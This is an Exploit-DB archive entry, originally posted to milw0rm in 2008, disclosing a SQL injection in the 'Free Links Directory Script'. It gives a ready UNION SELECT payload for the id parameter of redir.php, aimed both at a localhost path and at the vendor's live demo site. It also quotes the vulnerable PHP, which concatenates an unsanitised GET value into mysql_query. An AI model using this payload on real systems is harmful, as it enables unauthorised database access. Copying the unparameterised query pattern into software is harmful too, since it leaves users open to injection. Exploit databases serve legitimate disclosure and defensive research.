exploit-db-mirror/exploits/php/webapps/7453.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

31 lines
No EOL
809 B
Text

#Free Links Directory Script (id) SQL Injection Vulnerability
#Author: nuclear
#site:
http://flds-script.com
#vuln:
http://localhost/[path]/redir.php?id=-1%20UNION%20SELECT%201,2,@@version,4,5,6,7,8,9,10,11/*
#vulnerable code:
$ida = $_GET['id'];
$link = mysql_fetch_array(mysql_query("select * from links where id=$ida"));
$idcheck = mysql_numrows(mysql_query("select * from links where id=$ida"));
#demo:
http://flds-script.com/demo/redir.php?id=-1 UNION SELECT 1,2,@@version,4,5,6,7,8,9,10,11
#notes:
the injection does not work if trying to comment out the rest of the query.The result page will be a 404 but
you can get the data of the injection in the url
#greetz Mi4night, zYzTeM, THE_MAN, Pepe, I-O-W-A, Digitalfortress, DiGitalX, sys32-hack, sys32r, Whitestar
# milw0rm.com [2008-12-14]